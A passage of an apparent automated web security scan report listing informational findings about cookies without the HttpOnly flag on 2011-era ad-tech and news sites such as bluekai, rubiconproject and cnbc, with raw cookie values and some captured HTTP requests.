P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...

11.320. http://tags.bluekai.com/site/2831 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2831

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=g7FLHjizgJGBvF/1; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
bkc=KJh56M+/96WxOrOdEPepXaW7sYhXJv/QYJ/cOanRYYziDuyDWDH+g9xnchY/aMTxqqupWv0WVvHV/RV/ojta7DSe/iZ1iWah87uEZ0FtfM8tj7jtq8LXxwTeS/bDMHG9EKEOwrAJj2Dg8vh4TECzBohxo723oKKV/BpPvht0r5LFpK+jfDePmxVzIRYnRBZQE21jZpk4rTBs49NRecnd0FuRVlgDjLfUdZGWJrXDPFdgLz5+870gmPXf89VtoCxYfbVv8dluLpjpFFRbf4dpxVWAdPnhD8l6W9tgmPdfQ98FmxGL+Ox1OtJr5MWidVMp4gd67LNzUf+/K2IC438qYIjbqWzJyL1KSzfUw3s8SnlYkzPCZpkKm2O982IrAncTkUbSNH0FwDtwGtNQ/wJ1dugEwvI5GlbXmuOaBrXwmKbH87M+Dl/tY0x+MZN/zfptJ5ka2V1VldH/zfptBdldINta8arKfodn+v2EIgjBmgWJRUB2LGwLGFg7CldZIr0j+cxiJzNFfPIRT5Ge; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com
bkst=KJhBMM2n96WxhSz/Y/ASxE+OnshU57jZLfrAmo/DYQ3KvaMstflYw0K//SxE2J1/+FAWQZ9Ck7T1hzqKJomp0u+dfXtXNTYUJL9uMvgnbZjzw4ZdQySXY+39nawbUhQ/74jLUe5Xi4XZdQbTCYPcG2UxkbhRHN/CK3zbHVZRvSjQ2ct5dN0LmcpTW4xgSOl/mFJOGd4OSLE9CMbtFXPr+6Y6sIjgckFpBGbaBLRAHSk9HRHV0VaDGqE7hmp66aJKFlbVdYq6LLchRJInFgFs/8gzfGl0d/v0EgdcflUaNQg913xpxguEA2whN5t68+tNCqsgLZ9sGshJPQ==; expires=Wed, 14-Dec-2011 11:23:26 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.321. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=ivROpPU97tid8JkA; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bkc=KJh566N/sNWxOded1TZ4BSO/CSTWyudi50IYnxikJyX8H7JxHnaSFa4WvYgihP/ynu3W6J+KCcbxAp6DvQUhbvkD6/+Va//Ru0W3aVzu72ZjyIf0t8k8qlq4K2W0/mAR2cqzC9oQWYU4aCgL+BIWFwOAwEROTKjmbSO030w5f8UtxwggecOBBFHINQ5A/LYJ0TBKbUbUrUfe04PgFSbz7GHySkMS3zbfASTKb3402YGDHBMcfiFBI2Gwewyt3YnlR5Iy/XoC07KqIfUZXznlTpDCkjtwT2j78HH4BXizU2abOnnKVG/y8N+FD2m47yeqjmb4dDZjXb6lSK8AWQCzd3wbflftX6Popg4IUyEDMy/FUIU3tUUv7sd+Gdg5EVYwb3NdvAX7o1KP8IwuiEUoThUoAyduOX3dksFKuNzGk0+fkS1hbE4FoB1n6AIgowkdVUXCfd0Q1IP0UnZtUogggRmwQvPOQNxbf2Km2vQ0NNLw6KlMVIeGQ+zfjT8qa8z9CfxdVL8pIKp8YKA8jSblU3UefMXtSv68KlYozk+9Iid+nfzFk5wvDXIAi8Dpl5/U07IDRNlu0XgX45Rk+Of4ScXI57kAx4ga7exdgxB67i1BHMMPvm1X7dD57/5x0Q==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bko=KJ0ETtBQVv7dt8KHGRZeQzWE0sJiZ1QBR6NiQXM01YQeVz4NxmomzXaRmTxCnYRsPPT/u8eOZhzZoQ8kXEwWYAJRp9h7ruWLaGjy5QSsPwk4xaB6QvqXKwzE0YGW3gFTburxozz1RUW019ea+1Oi5TeZbziXOm3BWTvyZOQuGVvLewk9X8C4w9K3uIOCR/CfXQhGZhSz5RA4yQnShQ+MuxJ2difTakOVaLQvtcQ5Se/90+Hc0y==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bkst=KJhBMfNn96Wxhqz/vYqOxgOHh1JtpzhIqhkiYWHmYxGZ85lrcSQx+RQOSl+fKyLg65G34TsBVao3mi+Oqj0nMPLBFlkFl+LvKNhQ2YRwn6ZaEVMKRvf/5YfEyJN1JPzCoBpaNcJqiapklCMkQgQF2DIA7tmMT4cyjepXlFyC2WaGiE7kMjjQoO5SY365Z1cPvb6U3dXz+TluAPHnCNxsx91S2W/bJHahdFtBNo4PLomvWVyVc1I2pEiiYNpswcYqrS9eJPaSRdScs2vFLaSpF54Kt5XNVyK2Nk77/G8wm6UGcslc8FVLunltk0o9GHjvYbYtWoprpSbLNHZg1UzKeAK2q+nF5y4n3NwipXEUsxG71ILaG9xWQ9puiO9/ON1/jKol8RNoFVyKFDZ+Dpklco9gslwrRbuoXJisEvJsoEbdAkd2UtPj; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com
bkw5=KJhNkW+GWNWDCFdJVJF1NagO+ZJWPs0kSDJi6+QRL/taELL6yuyW5Vm+iUUkYhEWveT3bk/WGNZTYiSYrOYki/CrHnGDacsgN/VQSaUWP4uzrPwrRsTemjw15XT2gl2Z3QK9FTT8rQpiRMIQGVusQ6eHxpvTfJvIsB9/6utMMGRs5mv9huHQwn6ahOtFvFiMTz6QthjMlRld0PLwZxXe/TWb2+BoZdWferCrOuJq0xpaPa8zpzBpu8acxxtw/bJmQ0bMKOKU5SSM/GjfsXSnJBYi0Y7mat5abwXkioMH9Hw2ujsaF5uW/2PAb51TXT3W568clEZ2F9IXcbOqaOmZw7+hmYPMgixaTVTuIJSumfpZ/VaX2zE1Wgs/FsTkOyh+a0ERe4uAKeRP2w39BC0pQVDGb2dJGbpdzSydpES0UAm4bXrpfX/oXFUHCc5KGemBTQhxucwIY7THf6O6ZnmD2RPoTJYcg1HVkdyQzLHetMciWL88lWBVRj2n4kn1Yx2jME6rTjgwKAQ7hklY4EpR/KK8eHIc8BurjGeoBUDD7HNXpLi2lHpkFPEhp1K55rPAqxPnv/gpg1PpuIoeEPQ4SLJ8Uk7itU+i6QD7nP7qfJMRtlVvtREJ1qAldpC2t0omqxZqbbhCndNKfZoJpBtto4/c6s3g7fjZgXVSNRHg7oGxBVzGGRssnqVtm0+imgjy+kCV7qwjSps7Z7emFNZCwIfEh/zLtfnI0PaoLtnwmJS7/JxZ+YmDUBSBKqq+jw18f3uveEogwIgjXM6ZVLtoCBuxWtXDNFF8USJslL+sEmEasTUlDMvdcsufzJg+lueUUiBftTNQdRDyZP5wo5kgzuo3ykm8T8Y3LbBraJ0E9TqszFzXZdX9GjnTrx==; expires=Wed, 14-Dec-2011 10:42:49 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.322. http://tags.bluekai.com/site/3561 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3561

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=uj+KPIHxKdVd8JkA; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
bkc=KJh56pN/xkWDOdedu0mP4aOWxTAWk5eU6OJDWWHEQbwCDWuxWr6N29av+OCOcNxQ6+RAPmODx89W65QDeqU6xRv/sGWvx4KGBpN7K442mm4w8qNfqLAW8oTB+c6PFuRYvY7fCU6m112SSdR9ZBQWVrLXTIetPKtLZFnSvSK37hAGj/oKYbqnFG39Z43NAyjy6xWAk5PgtK4YNvX5PlL7WG9fdIB+y/NJc+dZo7f+l0SQJyC1Ouo8zgzy2VLl3FheccCDKK6fTR6R2fJym1G5mIaIwInIwmHIWUTu5CNy+yQfCSlYbdFzvfFzrulrTEjrIkdSkXgl+6Od7SwYUElzkB4rSyRiXyqurj3UmgZeyoEUUkYw6hlQnDF7UEcP+VNtTaUBh6YZ6AXmglvcCYZF4VyOpczeQbfDFhlYxtfrqpP42zTn8TEUhgC+yGPHf3pyCdeIYwKK1ct4+kt5hfVSpdRbnt8hETSTS5Pt3dFLfpVR6h8Kodt6dyY8NCcX; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com
bkst=KJykMgNnx6Wxhv2//uSFWZyDLq92lnlwwShYe/c/DTvYuUk4efEuxQPgKl+fS2WbP4TcLqED5BjVlG+qnEweqbqe8rrLlmn+GIbyH47lsePOjIAMJIAkPpabELkqqCrHPUqsv/gi+zldkwys/IV1kZYAWNGvgx71fwsptcVl+SD09OgxGOmukWEW+KIFRM26tpSPW+QxiV5796KA0sUvA5+9DzKYnKM2Nqg7A+2iQdfy5cCX5Z/mp0Keb2a2rgLSBUa6KjEbEbFV3F44vAYCaAGnvB1AAJbLveLPRpNs+dcijMvro2whqcBfV4ElGrX0aYue5xJx9QJ99JXxRosMSRx0NDFnVaq+Xru1+bx0Jy4/kDtjr8EvNpM61DMD39fRqd6cDBNRLx==; expires=Tue, 13-Dec-2011 13:08:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.323. http://tags.bluekai.com/site/38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/38

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=/W5cGhrm2Ibd8JkA; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
bkc=KJh56pN/xkWDOdedv0mPa9oovJWQ6pbck3YY/JG5eRziQoJGgbWwuvEaYnvG/vv+uSM93RRQYSvhvHo30uHOH/N9CSOfNarKLfpf4opp8dnKwq5LOtj4eeQIupTFDiQgOTE2PMewZwf+9EYhYqxo20JEXquPtNIp+tqvSb5+378rGJQ+IHgQ3FQb9Zq3N6TRysDcAaOVghP4Yamd5Ap+cRXegLvl0+dS0KwqlBuFd511r/w9Ns/NEITVo7f+JoPdM9awv322nfhh0g6LcegCwMlZEC80oybTUTV4CjlflvlYBZsEXc3DKtVUmhdZc7jy6dduFkJIr9wbblyilmUZoghtUyLxZEmx042f3j1fvWh8fU7NmBLOl7B6lkPEU5+L95fD49hA3dlA6YglkMek+RXS9UFuyv9pdVKgXJYnI6FBPf6ny77C+EarLlOhkeL7dYWzcKcKWbqF6fSGXfCHX2kK8TDy2IxVBblSn7V49p6szXqebfu42iXEOOjA; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
bko=KJynjt5QuJUd8zF/GYw1yweMlDXQ3NYxQKciob29NQ8CsWrwsznijs990Z3OhPH8sHC6jafbYMezQqJRsmvW/YyZCAuGsY+ew+9m8C4wQE3XKVWL5uinQ0aVW1JiRoMWOZah1jpkjZeTdF08npweHYinAusOCTWCfLApGJQV7cVJcX/YroTUhonARtOTalynvYLnj9PLF986axYK2E2I; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com
bkw5=KJh+AE+n96WDCqdB3ZhiMOW6VGMR3/C/1YkXB1S9WWnW5soMA8MmPtWMaGvaFjO9Y3ra/wQUnYlL2xX/V+M8vrp6lo6OHlOQeL+I5tqmwEzl9hTCrMpr8NVfWb1UAw+ecCpukl4J7iVlNpYh91PTZXARJBAFxhz+dlDH6S2/Q0UPtEswSPrffDss/bZBWDIL7YJSwTmSPYnXDliSfnvI6Fn4sgeMAcfZncAULrrxaWPn216eCy0yjzZc7ek60Y9qk3M7WTz1DqJWIpQFxsmAEENvTvPQ0nmx833ZW7/E6lT0SfXmQonLjeLiIqJV55iDfhbqGI7+rtJuD5nnR6UPlwh4MLKHbM7EFI7/8BF0W6I3v5s3IY9/s45N/k7cNjDug6BbuFXN/tvZznZrEAnrosYRVCPX/j8sTApoOddoUQT=; expires=Tue, 13-Dec-2011 15:21:09 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.324. http://tags.bluekai.com/site/3834 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3834

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=z+h8Pzt76vid8JkA; expires=Tue, 13-Dec-2011 11:25:08 GMT; path=/; domain=.bluekai.com
bkc=KJh56f2nxkWDOdeFv0B2oaO/ud//13a4x6+xxHeBMAjeWDaJ+B4xeNYAoHY03WYA4X9kzsL/Qi9SZbvCkiyvJchsDWnxmzMB5XfyfrwemPXrf2Npb0aQTzaYIm67qQsGAIKDWpSW8lNBhIijtQsbwJbNoHwv7ezrD3ND9opSPfyak0ct8vT62hFd+QwHJeYp6LipI8u8lfiBXg5aT/f0h+4vtyUoBKP6Ugoyvk6Ik7T2A78DFkKmcWolvQKP4zoqmK7NgnuqAHTBudwd1MT7lNyOQhf7kUrM6oylcrQ92CR+PB0ZPlrAAX3zBNbi8Vy4Kvf0KE415VBd9ciiIHMbSwup6hFuvVUms8I693s0CKc/If2+8HacIowZ0IrSL3rXmuc+PdTKkbT3F0M7h3xwkw7fM9B6cCz6726KntKAoNwudejtQ7EdI0lCuApVKEdMwydOXPQ=; expires=Tue, 13-Dec-2011 11:25:08 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.325. http://tags.bluekai.com/site/450 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/450

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=XHUkELt76vid8JkA; expires=Tue, 13-Dec-2011 11:53:38 GMT; path=/; domain=.bluekai.com
bkc=KJh562XgxtWROdeFRqv5qWUnOVLoLdngyGNYvq7K8KuYoaC0pTD4+qUzAeJYgKD4Vvat86Jjui850xDlH+HStbHx0Fr6cMFwzlcKzpT2pfKlz2f78YlQg9w/kfTM8Ca8L8y3pfM3dFWOLyXVds2NE0+cqxCE7C6tNdQZ6mqykY65PSRXmt+3rHyxgc8ss7eo/T2+uP1dIfzjY1V90zPS7+0+EwlLJomdpxJlJLIIP+f/uYXgJ2nuZVwoy3c6bTc6Gdv2zZO4rkUj3IhuUA2JgIhvP8nuxl8oIkfLzImqvbewTqH0P6iSXrpKaZOfpAvhDF5uolH1Z4nLKqmzf9ewjEgFZ37m57r9Jp14dSPSwpZhvCNUoMpf3Ocyauy1OBfdquLwO3Ddpcy8UPVrvvIBugrPF6SA0XGF03kCbENkKMIth8pcCj7w5GzUA+/EzVZbLTBKXddlV1naLvpE4rydJFeI5y==; expires=Tue, 13-Dec-2011 11:53:38 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.326. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Sat, 16-Jun-2012 10:13:37 GMT; Path=/
dq=3|2|1|0; Expires=Sat, 16-Jun-2012 10:13:37 GMT; Path=/
xdp_ti="17 Jun 2011 10:13:37 GMT"; Version=1; Max-Age=604800; Path=/
lm="17 Jun 2011 10:13:37 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.327. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:11 GMT; Path=/
dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response

11.328. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

khaos=GOVBRMNC-I-DXQD; Domain=.rubiconproject.com; Expires=Fri, 14-Jun-2019 11:28:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.329. http://va.px.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

segments_p1="eJwdkE9LAlEUxZmZt3i81Xyw9vUV+hgSFom20FXSH8zcREijszAkV+IkEbmJUkEQRsVooKHFCDNp95zN4ceZM+fe+4zScdcxSr9ubNFZZokuJ+DVI/woBJcX0BdmAjqlwDaO3u4L+ozfZNABCy4iaOsJziX9Rg5lgwT8nULHknT0UIsESN+9IfEcojZ3YIzue47brFUTJXa1gsiQk3sp+GgL9XdwOk3wfAp+b4HPN6jxNIKMfHFmsY2Zuz1pn+aVe1U5jtFe5HU+e70YvO5BF22uTr/chf5yg/EIq454zAOPLy35Pvxa+4BG19ig7gres2CdwigcCvYL+P+WdvJnyTYnoeV+ds5+FN4UW89OEaln9j/GpnXQ";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 15-Jun-2012 12:52:46 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.330. http://va.px.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://va.px.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

partnerUID="eyI4NCI6IFsic0hWeE81V245OU9Ma1BKQiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sat, 16-Jun-2012 11:21:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.331. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 18:32:40 GMT; path=/; domain=c3metrics.com
480-VT=adver_06-16-2011-18-06-44_13548876581308247604ZZZZadvertop100_06-16-2011-18-32-40_6866489311308249160; expires=Tue, 14-Jun-2016 18:32:40 GMT; path=/; domain=c3metrics.com
480-nUID=advertop100_6866489311308249160; expires=Thu, 16-Jun-2011 18:47:40 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

11.332. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; Domain=.bizographics.com; Expires=Thu, 15-Dec-2011 23:22:22 GMT; Path=/
BizoData=mUpILgcy5Am7gipPAOipqO4dQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe09XlmHCOEm1FExkNK7HUtFp4B4dlWpgdjqa4UIiibMYaD8l3ZY0x538ism9qBDYo7JFUsjoCeA3EOXnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRSTI80GqzWbIcisOAmFdycmEVUJBxdqAyBvInlHLHRUhLGYmcCLsoQ49iinFlQOiiO0IipNN9QFd9eD7q0ii95BlORQkTqQOyFqsEcggxAnMEZgmSj4bIddpEGisTfkPzrOvT6EHuRZNgOOtPKCBwYlvwyxBTxBmxysG3aSMDFLVpGkH0mismRaiiQRlez2D3XiirmwcmKlBdv1ZVcwOipUiiqfwoqJRljWvSvhZfgeAie; Domain=.bizographics.com; Expires=Thu, 15-Dec-2011 23:22:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.333. http://www.burstnet.com/enlightn/7644//AC95/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7644//AC95/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=1Bq.1Dzj^17Y.1Dzs; path=/; expires=Sat, 16-Jun-2012 11:29:08 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.334. http://www.capitalone.com/creditcards/gateway/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/creditcards/gateway/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.335. http://www.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc8sw%2fTFdw%2bInzeR9sZPbv%2bqvR3fNM6J0OXrmYeWauZ3E%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3YuAq63wy+X4=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OREF=http://cnbc.com/

Response

11.336. http://www.cnbc.com/id/32372321 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/32372321

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbRbw6uffmpB0AxANyuATTD5aMkoytxM7f0miPeiNE4Qig%3d; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /id/32372321 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
